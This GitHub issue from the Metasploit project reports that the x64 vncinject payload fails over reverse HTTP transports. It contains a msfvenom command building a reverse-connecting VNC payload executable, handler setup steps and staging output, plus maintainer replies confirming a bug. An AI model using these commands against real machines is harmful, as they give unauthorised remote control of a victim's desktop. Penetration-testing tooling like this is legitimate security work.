Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

vncinject does not work with reverse_*http* #9720

Open
3 tasks
eddieharari opened this issue Mar 16, 2018 · 3 comments
Open
3 tasks

vncinject does not work with reverse_*http* #9720

eddieharari opened this issue Mar 16, 2018 · 3 comments
Labels
bug confirmed Issues confirmed by a committer

Comments

@eddieharari
Copy link

Steps to reproduce

  1. msfvenom -p windows/x64/vncinject/reverse_winhttp -f exe lhost=192.168.2.115 > /mnt/vnchttp64.exe

  2. msfconsole
    use exploit/multi/handler
    set payload windows/x64/vncinject/reverse_http
    set lhost "IP OF METASPLOIT machine"

  3. Running the vnchttp.exe on windows 2012 machine with connectivity to the metaploit machine

Here are the results:

msf exploit(handler) > [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Staging x64 payload (475136 bytes) ...
[
] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Starting local TCP relay on 127.0.0.1:5900...
[] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Local TCP relay started.
[
] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Launched vncviewer.
[*] VNC connection closed.
/usr/bin/vncviewer: VNC server closed connection

What should happen?
VNC session should be open.

What happens instead?
VNC session allways break cause of server error.

Metasploit version

Framework: 4.16.2-dev
Console : 4.16.2-dev

I installed Metasploit with:

@busterb
Copy link
Member

busterb commented Mar 16, 2018

VNC doesn't support HTTP as a transport. Try using reverse_tcp instead. Just checked, it works fine using Tiger VNC as the vncviewer application.

@busterb busterb closed this as completed Mar 16, 2018
@busterb busterb changed the title Broken payloads with X64 vncinject does not work with reverse_*http* Mar 16, 2018
@busterb
Copy link
Member

busterb commented Mar 18, 2018

Noted above, it seems like around 2015 the code that prevents this payload combination from appearing in the list stopped blocking it. Still trying to work out what's wrong :/

@busterb busterb reopened this Mar 18, 2018
@busterb busterb added the bug label Jul 2, 2018
@github-actions
Copy link

github-actions bot commented Dec 2, 2020

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Dec 2, 2020
@dwelch-r7 dwelch-r7 added confirmed Issues confirmed by a committer and removed Stale Marks an issue as stale, to be closed if no action is taken labels Dec 2, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug confirmed Issues confirmed by a committer
Projects
None yet
Development

No branches or pull requests

3 participants